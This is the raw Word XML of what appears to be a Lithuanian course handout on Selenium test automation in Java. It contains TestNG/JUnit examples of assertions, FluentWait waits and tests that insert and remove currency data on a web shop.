            <w:bookmarkEnd w:id="69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8" w:name="_Toc14392890"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>System.out.println("START OF TESTING");</w:t>
            </w:r>
            <w:bookmarkEnd w:id="69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699" w:name="_Toc14392891"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="699"/>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700" w:name="_Toc14392892"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>@AfterTest</w:t>
            </w:r>
            <w:bookmarkEnd w:id="70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1" w:name="_Toc14392893"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>public static void afterClassText() {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="70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2" w:name="_Toc14392894"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>System.out.println("END OF TESTING");</w:t>
            </w:r>
            <w:bookmarkEnd w:id="70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3" w:name="_Toc14392895"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="70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704" w:name="_Toc14392896"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>@Test(priority = 1, groups = { "Test Group" })</w:t>
            </w:r>
            <w:bookmarkEnd w:id="704"/>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705" w:name="_Toc14392897"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>@Parameters({ "Email", "Password" })</w:t>
            </w:r>
            <w:bookmarkEnd w:id="70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6" w:name="_Toc14392898"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>public void testAssertions(String email, String password) {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="70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7" w:name="_Toc14392899"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>System.out.println("1ST TEST");</w:t>
            </w:r>
            <w:bookmarkEnd w:id="70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8" w:name="_Toc14392900"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.findElement(By.id("wishlist-total")).click();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="70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09" w:name="_Toc14392901"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>AssertJUnit.assertEquals("Number os Search box is incorrect", 1, driver.findElements(By.id("search")).size());</w:t>
            </w:r>
            <w:bookmarkEnd w:id="709"/>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="000E5A3D" w:rsidP="00372B3A">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="710" w:name="_Toc14392902"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>.....</w:t>
            </w:r>
            <w:bookmarkEnd w:id="71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11" w:name="_Toc14392903"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>String listElement = driver.findElement(By.id("wishlist-total")).getAttribute("Title");</w:t>
            </w:r>
            <w:bookmarkEnd w:id="71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12" w:name="_Toc14392904"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>AssertJUnit.assertEquals("Wish list button name is incorrect", "Wish List (0)", listElement);</w:t>
            </w:r>
            <w:bookmarkEnd w:id="71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13" w:name="_Toc14392905"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="71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714" w:name="_Toc14392906"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>@Ignore("Not implemented")</w:t>
            </w:r>
            <w:bookmarkEnd w:id="714"/>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="000E5A3D" w:rsidP="00372B3A">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:bookmarkStart w:id="715" w:name="_Toc14392907"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>@Test(priority = 2, groups = { "Test Group" })</w:t>
            </w:r>
            <w:bookmarkEnd w:id="71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lastRenderedPageBreak/>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:bookmarkStart w:id="716" w:name="_Toc14392908"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>public void test() {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="71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17" w:name="_Toc14392909"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>System.out.println("2ND TEST");</w:t>
            </w:r>
            <w:bookmarkEnd w:id="71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18" w:name="_Toc14392910"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="718"/>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719" w:name="_Toc14392911"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="719"/>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406716" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>2.4.</w:t>
      </w:r>
      <w:r w:rsidR="009D42E4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EF603F" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Mokymosi rezultatas. Naudoti laukimo metodus.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00EF603F" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A6F3B" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>užduotis.</w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> LAUKIMO METODŲ (ANGL. WAIT) NAUDOJIMAS</w:t>
      </w:r>
      <w:r w:rsidR="009D42E4">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493ADC" w:rsidRPr="00AD4464" w:rsidRDefault="00493ADC"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720" w:name="_Toc14392912"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>public class MyTest {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="72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1" w:name="_Toc14392913"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>private WebDriver driver = new ChromeDriver();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="72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2" w:name="_Toc14392914"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>@Before</w:t>
            </w:r>
            <w:bookmarkEnd w:id="72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3" w:name="_Toc14392915"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>public void setUp() {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="72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4" w:name="_Toc14392916"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.get("website link");</w:t>
            </w:r>
            <w:bookmarkEnd w:id="72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5" w:name="_Toc14392917"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="72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6" w:name="_Toc14392918"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>@After</w:t>
            </w:r>
            <w:bookmarkEnd w:id="72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7" w:name="_Toc14392919"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>public void closeBrowser() {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="72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8" w:name="_Toc14392920"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.close();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="72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29" w:name="_Toc14392921"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="729"/>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0" w:name="_Toc14392922"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>@Test</w:t>
            </w:r>
            <w:bookmarkEnd w:id="73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1" w:name="_Toc14392923"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>public void goodThreadSleepTest() throws InterruptedException {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="73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2" w:name="_Toc14392924"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Assert.assertTrue("Macbook logo isnt shown", isMacbookLogoShown(driver));</w:t>
            </w:r>
            <w:bookmarkEnd w:id="73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3" w:name="_Toc14392925"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="73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4" w:name="_Toc14392926"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>private static Boolean isMacbookLogoShown(WebDriver driver) throws InterruptedException {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="73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5" w:name="_Toc14392927"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Wait&lt;WebDriver&gt; wait = new FluentWait&lt;WebDriver&gt;(driver).withTimeout(15, TimeUnit.SECONDS)</w:t>
            </w:r>
            <w:bookmarkEnd w:id="73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6" w:name="_Toc14392928"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>.pollingEvery(1, TimeUnit.SECONDS).ignoring(NoSuchElementException.class);</w:t>
            </w:r>
            <w:bookmarkEnd w:id="73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7" w:name="_Toc14392929"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>try {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="73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8" w:name="_Toc14392930"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>return wait.until(new Function&lt;WebDriver, Boolean&gt;() {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="73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39" w:name="_Toc14392931"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>public Boolean apply(WebDriver driver) {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="73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0" w:name="_Toc14392932"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>return driver.findElement(By.xpath("//img[@alt='MacBookAir-1140x380']")).isDisplayed();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="74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1" w:name="_Toc14392933"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="74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2" w:name="_Toc14392934"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>});</w:t>
            </w:r>
            <w:bookmarkEnd w:id="74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3" w:name="_Toc14392935"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>} catch (TimeoutException e) {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="74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4" w:name="_Toc14392936"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>return false;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="74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5" w:name="_Toc14392937"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="74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746" w:name="_Toc14392938"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="746"/>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747" w:name="_Toc14392939"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="747"/>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4A6F3B" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.5</w:t>
      </w:r>
      <w:r w:rsidR="00EC1A02">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003178F4">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mokymosi rezultatas. Kurti išorinius duomenis naudojančius automatizuotus</w:t>
      </w:r>
      <w:r w:rsidR="00FB2657" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> testus</w:t>
      </w:r>
      <w:r w:rsidR="00EC1A02">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="004A6F3B" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>PRADINIŲ DUOMENŲ ĮRAŠYMAS</w:t>
      </w:r>
      <w:r w:rsidR="003178F4">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3178F4" w:rsidRPr="00AD4464" w:rsidRDefault="003178F4"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1"/>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4"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="748" w:name="_Toc14392940"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>public class MyTest {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="74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49" w:name="_Toc14392941"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>private WebDriver driver = new FirefoxDriver();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="74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0" w:name="_Toc14392942"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>private static String CODE = "TST";</w:t>
            </w:r>
            <w:bookmarkEnd w:id="75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1" w:name="_Toc14392943"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>private static String TTILE = "Test";</w:t>
            </w:r>
            <w:bookmarkEnd w:id="75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2" w:name="_Toc14392944"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>private static String SYMBOL = "T";</w:t>
            </w:r>
            <w:bookmarkEnd w:id="752"/>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lastRenderedPageBreak/>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:bookmarkStart w:id="753" w:name="_Toc14392945"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>private static BigDecimal VALUE = new BigDecimal(1.5);</w:t>
            </w:r>
            <w:bookmarkEnd w:id="75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4" w:name="_Toc14392946"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>private BigDecimal firstItemPrice;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="75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5" w:name="_Toc14392947"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>private BigDecimal secondItemPrice;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="755"/>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6" w:name="_Toc14392948"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>@Before</w:t>
            </w:r>
            <w:bookmarkEnd w:id="75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7" w:name="_Toc14392949"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>public void setUp() {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="757"/>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8" w:name="_Toc14392950"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>insertCurrency();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="75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59" w:name="_Toc14392951"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.get("http://vps351.minehost.lt/new/");</w:t>
            </w:r>
            <w:bookmarkEnd w:id="75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0" w:name="_Toc14392952"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="760"/>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1" w:name="_Toc14392953"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>@After</w:t>
            </w:r>
            <w:bookmarkEnd w:id="76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2" w:name="_Toc14392954"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>public void closeBrowser() {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="762"/>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3" w:name="_Toc14392955"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>removeCurrency();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="76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4" w:name="_Toc14392956"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.close();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="76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5" w:name="_Toc14392957"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="765"/>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6" w:name="_Toc14392958"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>@Test</w:t>
            </w:r>
            <w:bookmarkEnd w:id="76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7" w:name="_Toc14392959"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
